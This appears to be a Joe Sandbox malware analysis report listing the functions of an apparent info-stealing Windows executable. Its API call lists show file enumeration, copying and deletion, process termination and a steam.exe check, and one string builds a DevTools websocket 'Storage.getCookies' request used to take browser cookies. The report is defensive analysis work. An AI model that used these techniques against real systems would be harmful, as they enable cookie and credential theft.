                        • FindFirstFileA.KERNEL32(?,?), ref: 0050DD79
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 0050DD9C
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 0050DDB6
                        • wsprintfA.USER32 ref: 0050DDD4
                        • DeleteFileA.KERNEL32(?), ref: 0050DE20
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0050DDED
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F1557
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F1579
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F159B
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F15FF
                          • Part of subcall function 0050D980: memset.MSVCRT ref: 0050D9A1
                          • Part of subcall function 0050D980: memset.MSVCRT ref: 0050D9B3
                          • Part of subcall function 0050D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0050D9DB
                          • Part of subcall function 0050D980: lstrcpy.KERNEL32(00000000,?), ref: 0050DA0E
                          • Part of subcall function 0050D980: lstrcat.KERNEL32(?,00000000), ref: 0050DA1C
                          • Part of subcall function 0050D980: lstrcat.KERNEL32(?,0103DF78), ref: 0050DA36
                          • Part of subcall function 0050D980: lstrcat.KERNEL32(?,?), ref: 0050DA4A
                          • Part of subcall function 0050D980: lstrcat.KERNEL32(?,0103CFE0), ref: 0050DA5E
                          • Part of subcall function 0050D980: lstrcpy.KERNEL32(00000000,?), ref: 0050DA8E
                          • Part of subcall function 0050D980: GetFileAttributesA.KERNEL32(00000000), ref: 0050DA95
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0050DE2E
                        • FindClose.KERNEL32(00000000), ref: 0050DE3D
                        • lstrcat.KERNEL32(?,0103E398), ref: 0050DE66
                        • lstrcat.KERNEL32(?,0103D1E8), ref: 0050DE7A
                        • lstrlen.KERNEL32(?), ref: 0050DE84
                        • lstrlen.KERNEL32(?), ref: 0050DE92
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050DED2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                        • String ID: %s\%s$%s\*
                        • API String ID: 4184593125-2848263008
                        • Opcode ID: dced78942a9d0a7fe10161e224e8d7c6254044b784b04f85e4d1e4f1a60d1fba
                        • Instruction ID: ec2819db2a4a51be63f284cf2ba1ae5fd4b80f093bbb93e281c11b44765ecf3a
                        • Opcode Fuzzy Hash: dced78942a9d0a7fe10161e224e8d7c6254044b784b04f85e4d1e4f1a60d1fba
                        • Instruction Fuzzy Hash: BB618471A00209ABCB20EFB4DD49AEE7B79FF48300F048599B60597291DB39AA55CF54
                        Function 0050D530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 0050D54D
                        • FindFirstFileA.KERNEL32(?,?), ref: 0050D564
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 0050D584
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 0050D59E
                        • lstrcat.KERNEL32(?,0103E398), ref: 0050D5E3
                        • lstrcat.KERNEL32(?,0103E2C8), ref: 0050D5F7
                        • lstrcat.KERNEL32(?,?), ref: 0050D60B
                        • lstrcat.KERNEL32(?,?), ref: 0050D61C
                        • lstrcat.KERNEL32(?,00521794), ref: 0050D62E
                        • lstrcat.KERNEL32(?,?), ref: 0050D642
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050D682
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050D6D2
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0050D737
                        • FindClose.KERNEL32(00000000), ref: 0050D746
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 50252434-4073750446
                        • Opcode ID: 39b9baf7c8d16cc93dd32f02a6390d1c49fbdbbbdc5332b24528934b498e649f
                        • Instruction ID: 8b88dd3aaa7c251af1da7cf300ce6a5a3953b4719b91ca10818552da74ac5fb9
                        • Opcode Fuzzy Hash: 39b9baf7c8d16cc93dd32f02a6390d1c49fbdbbbdc5332b24528934b498e649f
                        • Instruction Fuzzy Hash: 2E618871D1011D9BCB20EFB5DD85AEE7BB8FF48304F048499E64993290DB38AA55CF94
                        Function 005148B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_
                        • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                        • API String ID: 909987262-758292691
                        • Opcode ID: 34969c36d628871d905c7e1d2ad242c16a3a71cc99d485d7540b34ff4ed6b9e4
                        • Instruction ID: b9ece77c518b11548338c56a7a4c1a66a83222f5c8a939e43685e4c0020c44c3
                        • Opcode Fuzzy Hash: 34969c36d628871d905c7e1d2ad242c16a3a71cc99d485d7540b34ff4ed6b9e4
                        • Instruction Fuzzy Hash: B0A24A71D01269DBEF20DFA8C8407EDBBB6BF88300F1485AAD518A7241EB755E85CF91
                        Function 005023A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005023D4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005023F7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00502402
                        • lstrlen.KERNEL32(\*.*), ref: 0050240D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050242A
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 00502436
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050246A
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00502486
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID: \*.*
                        • API String ID: 2567437900-1173974218
                        • Opcode ID: 6704a89c6821bd71a614766c53604533278dce70e1401ff2937402bb1d8936cf
                        • Instruction ID: a7b8f52e8488cd9897bc4ebdbfb8cf658b2d016604a93a5e384fd89d8b86d531
                        • Opcode Fuzzy Hash: 6704a89c6821bd71a614766c53604533278dce70e1401ff2937402bb1d8936cf
                        • Instruction Fuzzy Hash: AA418630A1151D8BCB31EF25DE89AAE77A4FF10308F045129FA4A97191CBB89C518B98
                        Function 005146A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 005146B9
                        • Process32First.KERNEL32(00000000,00000128), ref: 005146C9
                        • Process32Next.KERNEL32(00000000,00000128), ref: 005146DB
                        • StrCmpCA.SHLWAPI(?,?), ref: 005146ED
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00514702
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00514711
                        • CloseHandle.KERNEL32(00000000), ref: 00514718
                        • Process32Next.KERNEL32(00000000,00000128), ref: 00514726
                        • CloseHandle.KERNEL32(00000000), ref: 00514731
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                        • String ID:
                        • API String ID: 3836391474-0
                        • Opcode ID: 71ed22dd732198f2a3ba06e20a061d73a2c3800ff786ba2c00695eb6e1e897e2
                        • Instruction ID: bae338087c9c5a91aa7e3816b4e0c93fc1fc5b416d76595c4f24c4e63d2f3d32
                        • Opcode Fuzzy Hash: 71ed22dd732198f2a3ba06e20a061d73a2c3800ff786ba2c00695eb6e1e897e2
                        • Instruction Fuzzy Hash: 1101AD31601129ABE7315B609C88FFA3B7CEB49B11F084088FA0591080EF7899828E69
                        Function 00514610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00514628
                        • Process32First.KERNEL32(00000000,00000128), ref: 00514638
                        • Process32Next.KERNEL32(00000000,00000128), ref: 0051464A
                        • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00514660
                        • Process32Next.KERNEL32(00000000,00000128), ref: 00514672
                        • CloseHandle.KERNEL32(00000000), ref: 0051467D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                        • String ID: steam.exe
                        • API String ID: 2284531361-2826358650
                        • Opcode ID: 058899c409529be29198780055f859a49c92c060cc64d87499b5ac377261927d
                        • Instruction ID: 2f3f35ee42b10d6c2a93d298d5557548342be5eb8dcac35f42c3d3a9bef9c44f
                        • Opcode Fuzzy Hash: 058899c409529be29198780055f859a49c92c060cc64d87499b5ac377261927d
                        • Instruction Fuzzy Hash: C90162716011299BE730AB60AC49FEA7BBCEF09755F0441D5EA08D1040EF78D9958FE9
                        Function 00504B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00504B51
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504B74
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00504B7F
                        • lstrlen.KERNEL32(00524CA8), ref: 00504B8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504BA7
                        • lstrcat.KERNEL32(00000000,00524CA8), ref: 00504BB3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504BDE
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00504BFA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID:
                        • API String ID: 2567437900-0
                        • Opcode ID: c6b3130b8aaa9536ca8ecf055a35c38fae150a3511853403d93511b7eae9c3b5
                        • Instruction ID: 9a1d8cd398b14f1d6f5ea3cf6b671f6c10ba0540fb2d4d0f838e0da8471f5dd6
                        • Opcode Fuzzy Hash: c6b3130b8aaa9536ca8ecf055a35c38fae150a3511853403d93511b7eae9c3b5
                        • Instruction Fuzzy Hash: 3231557162111D9BCB31EF26ED85EAE7BB9FF40704F045129FA0597191CBB8DC118B94
                        Function 00512D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005171E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 005171FE
                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00512D9B
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00512DAD
                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00512DBA
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00512DEC
                        • LocalFree.KERNEL32(00000000), ref: 00512FCA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: 9cb50eb2719b0ae669f48f6c3670842132b3c93938bf1d18881de0719201b534
                        • Instruction ID: a875378603010f4996ef2867e02ee6fc0a317a4373193bd00afad8ff06fbb78d
                        • Opcode Fuzzy Hash: 9cb50eb2719b0ae669f48f6c3670842132b3c93938bf1d18881de0719201b534
                        • Instruction Fuzzy Hash: 08B10C71900209CFE725CF19C949BA5BBF5FB44324F29C1A9E4089B2A2D7769DD2CF80
                        Function 008A71BB Relevance: 10.3, Strings: 7, Instructions: 1565COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: E}~$.B+$5)}_$;W}$MHyo$Zk^$qJnu
                        • API String ID: 0-682286826
                        • Opcode ID: 906fd6ceab7c7098d241017961a944ba4a82738ef5be3634f973269261c81bf2
